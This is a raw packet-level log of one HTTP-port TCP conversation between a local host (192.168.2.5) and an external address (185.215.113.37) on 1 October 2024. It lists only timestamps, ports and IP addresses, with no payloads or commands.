Oct 1, 2024 19:32:06.038948059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.038949966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.038959980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.038988113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.038991928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039002895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039010048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039015055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039027929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039041996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039058924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039092064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039103031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039114952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039127111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039130926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039150000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039158106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039164066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039170027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039181948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039196014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039222002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039361000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039372921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039392948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039402962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039407015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039417982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039422035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039429903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039443016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039443970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039454937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039458990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039465904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039475918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039508104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039624929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039666891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039721966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039731979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039742947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039755106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039763927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039766073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039782047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039808989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039809942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039822102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039834023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039849997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039877892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039900064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039912939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039923906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039935112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039942026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039968967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.039980888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.039993048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040030003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040548086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040559053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040570974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040599108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040606976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040617943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040623903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040631056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040642977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040666103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040698051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040709019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040719032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040740967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040745020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040756941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040767908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040769100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040796995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040807009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040854931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040865898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040877104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040889025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040895939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040901899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040913105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.040915012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040941954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.040957928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.041112900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.041124105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.041136026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.041156054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.041174889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043059111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043071032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043081999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043123960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043148041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043158054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043159962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043171883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043183088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043195963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043198109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043206930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043206930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043226004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043236971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043241978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043247938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043260098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043262959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043272972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043296099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043325901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:06.043637991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:06.043704033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135607004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135637999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135648012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135668039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135725021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135735989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135763884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135767937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135767937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135770082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135781050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135828018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135874033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135881901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135890961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135895967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135905027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135916948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135926962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135935068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135937929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135947943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135958910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135968924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.135973930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135973930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.135981083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136014938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136014938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136035919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136055946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136080980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136099100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136110067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136116028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136157036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136187077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136254072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136307001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.136579990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.136692047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.137262106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:07.137372971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.864485979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:07.869488955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:08.587246895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:08.587337971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:08.679845095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:08.685139894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:09.393002987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:09.393110991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:10.068871021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:10.121169090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:10.780194044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:10.780308962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.128598928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.133492947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361393929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361404896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361476898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.361713886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361730099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361738920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361754894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.361756086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361767054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361784935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.361798048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.361814022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.361839056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.362210989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362221003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362231016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362241983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362255096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362265110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.362375021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489607096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489618063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489712000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489723921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489732027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489769936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489794016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489804983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489846945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489856958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489921093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489931107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489940882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489950895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489960909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489970922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.489975929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.489980936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490005016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490014076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490024090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490030050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490030050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490041018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490046024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490052938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490082026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490108013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490108967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490117073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490125895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490132093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490144968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490150928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490160942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490169048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490174055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490185022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.490195990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490215063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.490240097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.576278925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.576293945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.576354980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.576390982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614152908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614164114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614180088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614191055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614200115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614223003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614247084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614254951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614264011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614274979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614281893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614293098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614321947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614334106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614342928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614353895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614362955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614373922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614398956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614474058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614484072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614494085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614504099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614511967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614514112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614523888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614533901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614537001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614557981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614563942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614583969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614589930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614598989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614602089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614629984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614646912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614655018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614659071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614669085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614681005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614692926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614706039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614731073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614756107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614765882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614769936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614800930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614821911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614823103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614860058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614861012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614870071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614897013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614909887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.614965916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614975929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.614990950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615000963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615003109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615010023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615015030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615020990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615031004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615036011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615044117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615052938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615061045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615065098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615072966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615073919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615092993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615109921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615118027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615144968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615190029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615199089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615207911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615217924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615230083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615241051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615242958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615252972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615257025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615263939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.615283966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.615309954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738514900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738528967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738539934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738612890 CEST	49704	80	192.168.2.5	185.215.113.37
